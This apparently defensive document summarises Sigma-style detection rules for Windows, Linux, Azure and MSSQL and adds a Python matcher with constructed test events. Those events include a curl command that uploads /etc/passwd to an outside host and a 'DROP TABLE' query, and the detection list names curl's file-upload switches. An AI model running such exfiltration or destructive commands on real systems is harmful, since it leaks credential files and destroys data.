System Information Discovery via Registry Queries:
product: windows, category: process_creation, level: low, date: 2025-06-12
Detects attempts to query system information directly from the Windows Registry.
WScript or CScript Dropper - File:
product: windows, category: file_event, level: high, date: 2022-01-10
Detects a file with a .jse, .vbe, .js, .vba or .vbs extension written by cscript.exe or wscript.exe
MSSQL Destructive Query:
product: windows, level: medium, date: 2025-06-04
Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as "DROP TABLE" or "DROP DATABASE".
Application URI Configuration Changes:
product: azure, level: high, date: 2022-06-02
Detects when a configuration change is made to an application's redirect URI.
URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, URIs with wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.
UAC Bypass Using Windows Media Player - Process:
product: windows, category: process_creation, level: high, date: 2021-08-23
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Suspicious Curl File Upload - Linux:
product: linux, category: process_creation, level: medium, date: 2022-09-15
Detects a suspicious curl process start that attaches a local file to a web request
Password Protected ZIP File Opened:
product: windows, level: medium, date: 2022-05-09
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
Suspicious Download from Office Domain:
product: windows, category: process_creation, level: high, date: 2021-12-27
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in emails or OneNote documents
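The rule descriptions above state what each detection looks for but not how the match is evaluated. The following is an added example (not the published rules and not code from the rule project) that encodes three of them, the WScript/CScript dropper, the curl file upload and the MSSQL destructive query, as Sigma-style selections and runs them over constructed events. The event field names (Image, TargetFilename, CommandLine, statement), the per-event category tag, the exact curl switches and the regular expression are assumptions made for the example; the real rules may use different fields and value lists.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed, Sigma-style rule definitions loosely modelled on the descriptions
# above. This is an added example; field names and value lists are assumptions.
RULES: List[dict] = [
    {
        "title": "WScript or CScript Dropper - File",
        "level": "high",
        "category": "file_event",
        "selection": {
            "Image|endswith": ["\\wscript.exe", "\\cscript.exe"],
            "TargetFilename|endswith": [".jse", ".vbe", ".js", ".vba", ".vbs"],
        },
    },
    {
        "title": "Suspicious Curl File Upload - Linux",
        "level": "medium",
        "category": "process_creation",
        "selection": {
            "Image|endswith": ["/curl"],
            # curl switches that attach a local file to the request (assumed list)
            "CommandLine|contains": [" -F ", " --form", " --upload-file", " -T ", " -d @", " --data @"],
        },
    },
    {
        "title": "MSSQL Destructive Query",
        "level": "medium",
        "category": "mssql_query",
        "selection": {"statement|re": [r"\bDROP\s+(TABLE|DATABASE)\b"]},
    },
]


def _field_matches(event: Event, spec: str, wanted: List[str]) -> bool:
    """Evaluate one 'field|modifier' entry; values in the list are OR-ed.
    String comparisons are case-insensitive, as in Sigma."""
    field, _, modifier = spec.partition("|")
    value = event.get(field)
    if value is None:
        return False
    if modifier == "re":
        return any(re.search(p, value, re.IGNORECASE) for p in wanted)
    v = value.lower()
    cands = [w.lower() for w in wanted]
    if modifier == "endswith":
        return any(v.endswith(c) for c in cands)
    if modifier == "startswith":
        return any(v.startswith(c) for c in cands)
    if modifier == "contains":
        return any(c in v for c in cands)
    if modifier == "":
        return v in cands
    raise ValueError(f"unsupported modifier: {modifier}")


def match_rule(rule: dict, event: Event) -> bool:
    """All selection entries must hold (AND) and the log category must agree."""
    if event.get("category") != rule["category"]:
        return False
    return all(_field_matches(event, spec, wanted) for spec, wanted in rule["selection"].items())


def detect(events: List[Event], rules: List[dict] = RULES) -> List[Tuple[str, str, Event]]:
    """Return (rule title, level, event) for every rule that fires on every event."""
    return [(r["title"], r["level"], ev) for ev in events for r in rules if match_rule(r, ev)]


# Constructed sample events: one hit and one benign near-miss per rule.
SAMPLE_EVENTS: List[Event] = [
    {"category": "file_event", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Temp\\stage2.vbs"},
    {"category": "file_event", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Temp\\log.txt"},
    {"category": "process_creation", "Image": "/usr/bin/curl",
     "CommandLine": "curl -F file=@/etc/passwd http://203.0.113.5/upload"},
    {"category": "process_creation", "Image": "/usr/bin/curl",
     "CommandLine": "curl -sS https://example.com/index.html -o index.html"},
    {"category": "mssql_query", "statement": "DROP TABLE dbo.AuditLog;"},
    {"category": "mssql_query", "statement": "SELECT name FROM sys.tables"},
]

if __name__ == "__main__":
    for title, level, ev in detect(SAMPLE_EVENTS):
        print(f"[{level}] {title}: {ev}")
```

The modifiers follow the Sigma convention that every value in a list is an alternative while every field in a selection must hold; the benign curl event shows why the switch list carries surrounding spaces, so that `-sS` or a URL containing `-F` does not fire the rule.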